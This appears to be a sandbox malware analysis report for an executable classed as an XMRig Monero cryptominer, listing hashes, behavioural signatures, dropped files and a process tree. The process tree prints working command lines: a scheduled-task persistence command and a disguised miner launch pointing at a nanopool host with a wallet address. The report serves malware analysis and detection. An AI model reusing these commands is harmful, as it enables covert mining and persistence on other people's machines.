Overview

overview

10

Static

static

7

file.exe

windows7-x64

10

file.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/07/2023, 22:03

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    file.exe

  • Size

    3.2MB

  • MD5

    3a20a6145a7a57af149bfd110fdd6300

  • SHA1

    7626cf05a564a565d17cb85aaf6b93c871c3de91

  • SHA256

    8e9e34d70a388ee2721911e266e68ebfcdaf460803fa1baf66f9b6cbf560b2a9

  • SHA512

    182bf26f7d072d56a0435c4a088baa2d5d1d58c8c048c7f517a91177ee6cec52f3e83e2bfbaf5f046265117281daf059d6bca39cecd5fa279ff081f7fff9319d

  • SSDEEP

    49152:2PtyRSv3AJhGiPWGhUyJ4STSVP1JXrb2XpZofxX3ePG0cid7X9MJM5r:EcRe388iPWGmyJ5GV7n2XjOXeGxihrr

Score
10/10
xmrigminer

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 11 IoCs
    miner
  • .NET Reactor proctector 3 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2720
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEB1B.tmp.bat""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3732
      • C:\Windows\system32\timeout.exe
        timeout 3
        3⤵
        • Delays execution with timeout.exe
        PID:2548
      • C:\ProgramData\BinEngFrame\PCELK.exe
        "C:\ProgramData\BinEngFrame\PCELK.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:440
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PCELK" /tr "C:\ProgramData\BinEngFrame\PCELK.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4384
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PCELK" /tr "C:\ProgramData\BinEngFrame\PCELK.exe"
            5⤵
            • Creates scheduled task(s)
            PID:3016
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -o xmr-eu1.nanopool.org:14433 -u 87N2CazJHoaY8ofHfhpKfj2SGmfMDHPXkgZNgeArkrabCc8vC81NNzxdN6Rjfemw5TGmZ2vbDrC6wDxqdGf7eqqYVBUpMZD --tls --coin monero --max-cpu-usage=50 --donate-level=1 -opencl
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:4940

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\BinEngFrame\PCELK.exe
          Filesize

          722.0MB

          MD5

          3271628956fd21cd715d41bedfd91216

          SHA1

          4313f30f7bfdcc3dd4a787cb69d85d92965784d3

          SHA256

          169291fe508a802bcbf5efad4a9de787c420ba29e26aebb7b8d46280ead573f4

          SHA512

          72ea68f49b0ca8c5cd7b63846979e4f9bdf80fab3ce6a2c92ee3fc329aa23106c65f84d3499e7f40e52a67b9f0b072a33d8ddef793822df7758b47b43b3d284f

          Download Submit

        • C:\ProgramData\BinEngFrame\PCELK.exe
          Filesize

          722.0MB

          MD5

          3271628956fd21cd715d41bedfd91216

          SHA1

          4313f30f7bfdcc3dd4a787cb69d85d92965784d3

          SHA256

          169291fe508a802bcbf5efad4a9de787c420ba29e26aebb7b8d46280ead573f4

          SHA512

          72ea68f49b0ca8c5cd7b63846979e4f9bdf80fab3ce6a2c92ee3fc329aa23106c65f84d3499e7f40e52a67b9f0b072a33d8ddef793822df7758b47b43b3d284f

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\tmpEB1B.tmp.bat
          Filesize

          145B

          MD5

          cb982cd8c77c6f19e6b0ae7347e77ebe

          SHA1

          6a81aed2cca668af07db628d7cb5cedc1c94cb08

          SHA256

          b531dbcd9d404faee426733e8ff37b3d8f2cd82f3aeab7901512011812fd8ea9

          SHA512

          ed876060391d2cc84d8ebf4d07ef2b670f7758f82a2d075307794a28f1daa8f4810b01c763537620bfb5829deefb5f8b5f3a99bd4dae9fd95fbf7b710c24e7fe

          Download Submit

        • memory/440-178-0x00007FFBF4200000-0x00007FFBF4CC1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/440-154-0x00000000023B0000-0x00000000023C0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/440-153-0x0000000001B00000-0x0000000001B01000-memory.dmp

          Filesize

          4KB

          Download

        • memory/440-152-0x00000000023B0000-0x00000000023C0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/440-151-0x00007FFBF4200000-0x00007FFBF4CC1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/440-150-0x00007FFBF4200000-0x00007FFBF4CC1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2720-146-0x00007FFBF3EC0000-0x00007FFBF4981000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2720-133-0x00000000009B0000-0x0000000000CF2000-memory.dmp

          Filesize

          3.3MB

          Download

        • memory/2720-139-0x000000001C850000-0x000000001C860000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2720-138-0x00007FFBF3EC0000-0x00007FFBF4981000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2720-136-0x0000000003670000-0x0000000003671000-memory.dmp

          Filesize

          4KB

          Download

        • memory/2720-135-0x000000001C850000-0x000000001C860000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2720-134-0x00007FFBF3EC0000-0x00007FFBF4981000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4940-163-0x0000026E39F80000-0x0000026E39FA0000-memory.dmp

          Filesize

          128KB

          Download

        • memory/4940-162-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

          Download

        • memory/4940-161-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

          Download

        • memory/4940-164-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

          Download

        • memory/4940-165-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

          Download

        • memory/4940-166-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

          Download

        • memory/4940-167-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

          Download

        • memory/4940-168-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

          Download

        • memory/4940-169-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

          Download

        • memory/4940-170-0x0000026E3A010000-0x0000026E3A050000-memory.dmp

          Filesize

          256KB

          Download

        • memory/4940-171-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

          Download

        • memory/4940-172-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

          Download

        • memory/4940-160-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

          Download